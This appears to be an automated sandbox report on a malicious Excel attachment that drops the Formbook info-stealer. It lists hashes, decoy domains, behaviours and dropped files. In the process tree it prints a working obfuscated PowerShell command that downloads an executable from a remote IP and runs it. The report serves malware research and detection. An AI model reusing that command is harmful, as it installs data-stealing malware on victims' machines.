Analysis

  • max time kernel
    149s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    29-08-2024 05:51

General

  • Target

    PO-014842-2.xls

  • Size

    555KB

  • MD5

    0eca5068b23513d7d20d9f05b5a33cde

  • SHA1

    b11da160460403bacb257d4832ca617fcf8c9840

  • SHA256

    b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

  • SHA512

    2b16f2c208573a9361b646e34b6ac627fb3d9b80fb0ff7a09cf3d0e5bfeefb2d09ad482e428a5effe80a3da1267df4c07f08728f589ea6b01324ef6adb102d16

  • SSDEEP

    12288:++M2PYL9XdP7MqOZzCSbxuKuw+9WompCHYCFxi7Ehh7wYf:+cPYLpdwZdMK3ewCHTqo0Y

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b48n

Decoy

anifestmindset.net

ommybahamabigsales.shop

3tcxr.xyz

iano-world.net

rconf23.net

atherpa.shop

trllrpartners.club

5sawit777.pro

ctbhuxcdreioijresol.top

opinatlas.app

pinstar.xyz

mfengwa.top

8games13.xyz

tickpaket.online

iphuodongallbbtbtm.top

ental-bridges-51593.bond

laywithkemon.rest

lkpiou.xyz

a88.land

igfloppafan.club

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2164
    • C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\SysWOW64\explorer.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2908
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3044
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:596
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3024
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1315.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1314.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1072
        • C:\Users\Admin\AppData\Roaming\MeMpEng.exe
          "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:320
          • C:\Users\Admin\AppData\Roaming\MeMpEng.exe
            "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1580

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    344B

    MD5

    2a22d79f810194591562f5550fd2fdaf

    SHA1

    9085f1492a5bcc3f539169ebd82cbe8ead4f4eec

    SHA256

    d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1

    SHA512

    281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    9549a9df6fb8e5461fa607946d9c9748

    SHA1

    d3bd6f0f2de6ed62e308d4f922a59c3724f237e9

    SHA256

    f12d576691cd566f1efa4138379c523e4ad042a0229e1f56a1e3e5796d805cb6

    SHA512

    bf8c9fb45c394ed349430c0c839c45a387e754ccaa3e8cdeb3a7cc97b6b8ccbaa7e7dff0b82ac0eb26ef214a8155b00a69931510566b0d7e3ff1d5957f9ede6a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    544B

    MD5

    534bd99e6dce3f8e39411bc94ae98ed4

    SHA1

    5e322b728f5f54432676a7ac363410d18d21e7b7

    SHA256

    f12c730a786b665bc5ffd38bf5e5304200fe027e3d447ff41d88b0820e3a6076

    SHA512

    eb12556f0ac6e503316b7fe374fd7c48db7a026dd1d1fe63c3b02ac6e862fb804868ee9afe66b2ae0d9f68cc04e0bba65c3d8e7670415ff6790c3e81a941da9e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5J67VDZD\IEnetworthUpdated[1].hta

    Filesize

    12KB

    MD5

    87635cf66104074c53e698677de6002b

    SHA1

    958ba282403c968f0dc8631aa396b8a73612ffe3

    SHA256

    4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf

    SHA512

    7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

  • C:\Users\Admin\AppData\Local\Temp\CabD69.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES1315.tmp

    Filesize

    1KB

    MD5

    add1b3eb87540c5e6cff33722db2a32e

    SHA1

    637d4bc402cdb9c12e1a9dcab2c4b62db80cc471

    SHA256

    a709d5ad70c519880139406b1a35b6308a760bcf41775f4d8344f71b909bed84

    SHA512

    8197cd854351cf27e2eb5dcce0d30aac4b5a6c587152527bdcd2f8f7aee63532c74e90a6c5eede03d6f654fbdcf3b0c10760e9a9d8b0cba55d7f387d1b04b54d

  • C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.dll

    Filesize

    3KB

    MD5

    31dfc3cd590af0c5630dd31bf6695053

    SHA1

    70e083b9537bda9f08985ce0637c24032dc305ac

    SHA256

    d71d8aa1c81f7c4a8a93aedef302418a9a213858f7ee8c5b4152b828c39fd9e7

    SHA512

    4e9738b591e75149ee22698e0a414a9ab5baa13ad439dbbc0bc1e245d749ad43217d7c83e285949ae9fd2792066609b06893da79f865bf6bc93aae1d99332083

  • C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.pdb

    Filesize

    7KB

    MD5

    948fcf44ad78a7efdfed5cec6e8e2878

    SHA1

    c93e73caec310d62a21287c053d3802da4c8e4e4

    SHA256

    95bd08f3d4e27014c30681fa43bd471f9a356d681c0dd28b699d59bad9fe0e97

    SHA512

    d35fdcbc397e478aa0b1e54d4c3d3ba3db7ba397f46bb406e713a88693a93dd046901e615db9af963ad3a348721de0a1b08fb3039ed2bec346baacc94686caab

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC1314.tmp

    Filesize

    652B

    MD5

    1b4f65611ebc13e5b7a5198551084ff7

    SHA1

    89e7d3f5e0df7cb5bf20c723b7e73d9318c9f285

    SHA256

    aa8d9b46f7b688268f7a22eeca331325fda1ebe9ff83d3b45b022648622eb996

    SHA512

    5ff43c55ba5e2078cc8564eec8f1de11dc765e0efacf7fa9f1bea40c6a236578aeb596c876513df8b491f760b66244976b9b62d48392aa74f305ebb464bf4954

  • \??\c:\Users\Admin\AppData\Local\Temp\nsfvyqgd.0.cs

    Filesize

    469B

    MD5

    f2a64cd1f09c060d9412d84239f92021

    SHA1

    8053849b3e79d63181b74207b19e76775a248982

    SHA256

    2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7

    SHA512

    f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

  • \??\c:\Users\Admin\AppData\Local\Temp\nsfvyqgd.cmdline

    Filesize

    309B

    MD5

    4eda8a94dbf86bb66f8d20cd21aaad8e

    SHA1

    eb3c28587b33168462da935058ff9801bf4c6d2a

    SHA256

    1fc1f6b99ecfbf2052b92ef27d4133864a7b3dc2ad95765d296e18388f7e1a6d

    SHA512

    0d95d10746f0af83b4c71a35b6b94a587f2e97c2cf20c8cd662ed1d37c20d90543edb67c698d54e019fe6cbb457befd50d6f39da82a22927305d48dd4e0ac3d9

  • \Users\Admin\AppData\Roaming\MeMpEng.exe

    Filesize

    604KB

    MD5

    dd2e0becfb1316c49975386fc3367c45

    SHA1

    98c578ff997ef781919ca5967251fa9d462a756e

    SHA256

    14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628

    SHA512

    4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

  • memory/320-61-0x0000000000DF0000-0x0000000000E8C000-memory.dmp

    Filesize

    624KB

  • memory/320-63-0x00000000004B0000-0x00000000004C8000-memory.dmp

    Filesize

    96KB

  • memory/320-64-0x00000000047B0000-0x0000000004826000-memory.dmp

    Filesize

    472KB

  • memory/1256-78-0x0000000004BD0000-0x0000000004C8F000-memory.dmp

    Filesize

    764KB

  • memory/1580-69-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1580-67-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1580-65-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1580-70-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2164-1-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB

  • memory/2164-62-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB

  • memory/2164-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2164-17-0x0000000002430000-0x0000000002432000-memory.dmp

    Filesize

    8KB

  • memory/2164-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2164-89-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB

  • memory/2188-74-0x0000000000AE0000-0x0000000000D61000-memory.dmp

    Filesize

    2.5MB

  • memory/2188-75-0x00000000000E0000-0x000000000010F000-memory.dmp

    Filesize

    188KB

  • memory/2696-16-0x00000000001F0000-0x00000000001F2000-memory.dmp

    Filesize

    8KB